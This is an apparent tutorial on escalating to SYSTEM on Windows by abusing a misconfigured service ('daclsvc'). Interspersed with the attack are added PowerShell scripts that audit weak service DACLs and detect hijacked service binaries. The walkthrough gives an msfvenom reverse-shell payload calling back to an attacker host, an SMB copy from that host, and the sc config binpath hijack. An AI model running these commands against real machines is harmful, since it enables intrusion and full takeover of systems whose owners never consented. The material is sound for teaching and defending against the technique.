Windows PrivEsc using Insecure Service Permissions

Today we’ll walk through Windows privilege escalation via insecure service permissions. This lesson is useful once you have compromised a Windows machine, for example with a publicly available exploit, and hold a foothold as a low-privileged user that you want to escalate to admin rights.

Before moving on to the exploitation part, we need to confirm that the victim machine runs a service with insecure permissions. You can use the Windows Privilege Escalation Awesome Scripts (“WinPEAS.exe”) to find out whether such services are present. In this scenario, the victim machine has an insecurely configured service called “daclsvc”. Let’s exploit this service.

First, we need to create a payload that will call back to our listener and give us a shell. I use “msfvenom” to generate a Windows payload for this scenario.

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe

Note: Make sure to update the LHOST IP address accordingly.

Once you have generated the payload, transfer it to the victim machine. I am going to place it in the C:\PrivEsc\ directory on the victim. There are many ways to do this; the simplest is to start an SMB server on the Kali machine in the same directory as the file, then use the standard Windows copy command to fetch it.

    copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe

Now our system is ready to perform the privilege escalation attack.

Exploit:

First, we need to check what permissions our user account has on the daclsvc service. I used SharpUp.exe for this. SharpUp is the start of a C# port of PowerUp’s privilege escalation checks; currently only the most common checks have been ported, and no weaponization functions have been implemented yet. You can download the tool from the link below.

The output shows that the current user has a modifiable service, “daclservice.exe”. Next, we query the service configuration and note that it runs with SYSTEM privileges (SERVICE_START_NAME):

    sc qc daclsvc
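The weakness SharpUp reports is a service DACL that grants a low-privileged principal SERVICE_CHANGE_CONFIG (or WRITE_DAC/WRITE_OWNER, which lead to the same place). The following PowerShell audit is an added example, not code from the original post or from SharpUp/WinPEAS: it parses the SDDL that `sc.exe sdshow` prints for every service and reports allow-ACEs where a trustee such as Authenticated Users or BUILTIN\Users holds one of those rights. It assumes Windows PowerShell 5.1 or later and calls `sc.exe` by its full name because `sc` alone is the Set-Content alias in PowerShell. The SDDL string at the bottom is constructed to resemble a misconfigured service and is not the real daclsvc descriptor.

```powershell
# Added example (not part of the original post): audit service DACLs for the
# weakness abused on this page. Assumes Windows PowerShell 5.1+ and sc.exe on PATH.

# SDDL service-right tokens that let a trustee reconfigure or take over a service:
# DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER, GA/GW = generic all/write
$DangerousRights = @('DC', 'WD', 'WO', 'GA', 'GW')
# The same rights as bits, for ACEs that carry a hex access mask instead of tokens
$DangerousMask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
# Trustees that any local user typically satisfies (SDDL abbreviations and raw SIDs)
$LowPrivTrustees = @('AU', 'BU', 'WD', 'IU', 'AN',
                     'S-1-5-11', 'S-1-5-32-545', 'S-1-1-0', 'S-1-5-4', 'S-1-5-7')

function Get-SddlRiskyAces {
    # Returns each allow-ACE in a service SDDL string that grants a low-privileged
    # trustee a dangerous right. Pure string parsing, so it also works on SDDL
    # copied from another host.
    param([Parameter(Mandatory)][string]$Sddl)

    $dacl = ($Sddl -split 'D:', 2)[1]
    if (-not $dacl) { return @() }
    $dacl = ($dacl -split 'S:', 2)[0]            # drop the SACL if one is present

    foreach ($m in [regex]::Matches($dacl, '\(([^)]*)\)')) {
        $fields = $m.Groups[1].Value -split ';'   # type;flags;rights;objguid;inhguid;trustee
        if ($fields.Count -lt 6 -or $fields[0] -ne 'A') { continue }   # only allow ACEs matter
        $rights  = $fields[2]
        $trustee = $fields[5]
        if ($LowPrivTrustees -notcontains $trustee) { continue }

        if ($rights -like '0x*') {
            $mask = [Convert]::ToInt64($rights.Substring(2), 16)
            $bad  = if (($mask -band $DangerousMask) -ne 0) { @($rights) } else { @() }
        } else {
            $tokens = [regex]::Matches($rights, '..') | ForEach-Object { $_.Value }
            $bad    = @($tokens | Where-Object { $DangerousRights -contains $_ })
        }
        if ($bad.Count -gt 0) {
            [pscustomobject]@{ Trustee = $trustee; Rights = ($bad -join ','); Ace = $m.Value }
        }
    }
}

function Find-WeakServiceDacl {
    # Enumerates every installed service and reports those whose DACL a low-privileged
    # user could abuse to repoint the binary path, as done with daclsvc above.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $sddl = (& sc.exe sdshow $svc.Name 2>$null | Where-Object { $_.Trim() }) -join ''
        foreach ($hit in Get-SddlRiskyAces -Sddl $sddl) {
            [pscustomobject]@{
                Service = $svc.Name
                RunsAs  = $svc.StartName     # LocalSystem is what turns this into privilege escalation
                BinPath = $svc.PathName
                Trustee = $hit.Trustee
                Rights  = $hit.Rights
            }
        }
    }
}

# Offline demonstration on a constructed SDDL (not the real daclsvc descriptor):
# SYSTEM and Administrators hold full control, and Authenticated Users (AU) also
# hold DC, which is the misconfiguration this page exploits.
$weak = 'D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)' +
        '(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
        '(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)'
Get-SddlRiskyAces -Sddl $weak | Format-Table -AutoSize

# Live audit of the local host (run elevated so sdshow succeeds for every service):
# Find-WeakServiceDacl | Format-Table -AutoSize
```

Any row this returns for a service that runs as LocalSystem is the daclsvc situation. The fix is to remove DC, WD and WO from the low-privileged ACEs and write the corrected descriptor back with `sc.exe sdset <service> "<sddl>"`, then re-run the audit to confirm the row is gone.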

Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable we created:

    sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

Start a Netcat listener on Kali, then start the service to spawn a reverse shell running with SYSTEM privileges.

To start the service:

    net start daclsvc

Check your Netcat listener; the user is now an admin 😎
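What the attack leaves behind is a SYSTEM service whose BINARY_PATH_NAME points at an unsigned executable in an unusual directory (C:\PrivEsc\reverse.exe). The following PowerShell check is an added example, not part of the original post: it pulls every service's PathName, extracts the executable (handling quoted paths and arguments), and flags binaries that sit outside the normal system locations or fail Authenticode validation. It assumes Windows PowerShell 5.1 or later and read access to the service binaries; the trusted-root list and the PathName samples at the bottom are constructed assumptions.

```powershell
# Added detection example (not part of the original post): find services whose
# binary lives outside the usual system locations or is not validly signed, the
# state a binpath hijack like the daclsvc one above leaves behind.

# Directories where legitimate service binaries normally live (assumption; extend for your estate)
$TrustedRoots = @("$env:SystemRoot", "$env:ProgramFiles", "${env:ProgramFiles(x86)}")

function Get-ServiceExecutable {
    # Extracts the executable from a Win32_Service PathName, handling quoted paths and arguments.
    param([Parameter(Mandatory)][string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $p.Trim('"')
    }
    # Unquoted: take the first token (spaces in unquoted paths are a separate weakness)
    return ($p -split '\s+')[0]
}

function Test-PathUnderTrustedRoot {
    # True when $Path is inside one of $Roots (case-insensitive, whole-directory match).
    param([Parameter(Mandatory)][string]$Path, [string[]]$Roots = $TrustedRoots)
    foreach ($r in $Roots) {
        if ($r -and $Path.StartsWith($r.TrimEnd('\') + '\', [StringComparison]::OrdinalIgnoreCase)) {
            return $true
        }
    }
    return $false
}

function Find-SuspiciousServiceBinary {
    # Reports every service whose binary is outside the trusted roots, is missing, or
    # fails Authenticode validation; RunsAs lets you triage LocalSystem services first.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service | Where-Object { $_.PathName }) {
        $exe = Get-ServiceExecutable -PathName $svc.PathName
        $reasons = @()
        if (-not (Test-PathUnderTrustedRoot -Path $exe)) { $reasons += 'outside trusted roots' }
        if (Test-Path -LiteralPath $exe) {
            $sig = Get-AuthenticodeSignature -FilePath $exe
            if ($sig.Status -ne 'Valid') { $reasons += "signature $($sig.Status)" }
        } else {
            $reasons += 'binary missing'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Service    = $svc.Name
                RunsAs     = $svc.StartName
                State      = $svc.State
                Executable = $exe
                Reasons    = ($reasons -join '; ')
            }
        }
    }
}

# Offline check of the parser on constructed PathName values
Get-ServiceExecutable -PathName '"C:\PrivEsc\reverse.exe"'
Get-ServiceExecutable -PathName 'C:\Windows\system32\svchost.exe -k netsvcs'
Test-PathUnderTrustedRoot -Path 'C:\PrivEsc\reverse.exe'

# Live scan of the local host:
# Find-SuspiciousServiceBinary | Sort-Object RunsAs | Format-Table -AutoSize
```

Running this on a schedule and diffing the output against a known-good baseline surfaces a repointed binpath even when no event log entry was generated for the change.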

udesh